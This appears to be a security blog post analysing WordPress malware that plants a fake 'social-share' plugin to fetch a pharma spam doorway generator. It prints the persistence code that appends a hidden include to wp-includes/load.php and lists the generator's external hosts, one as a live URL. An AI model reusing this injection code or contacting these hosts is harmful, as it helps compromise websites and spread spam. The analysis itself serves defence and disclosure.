Fake Social Share WordPress Plugin Creates Pharma Spam Doorways

We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.

Path: wp-content/plugins/social-share/wp-social-share.php

This file creates wp-content/plugins/social-share/share.php that calls itself WP Social Include File. It downloads doorway generator from hxxp://api-linux . net/json/json_01.txt, writes it into wp-content/mu-plugins/mu-plugin.png and then includes this file at the bottom of wp-includes/load.php:

...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);}
...

The doorway generator uses the following URLs:

...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';

$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';

$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...

Some of the above URLs should only be accessed using a special User Agent

$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";

If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.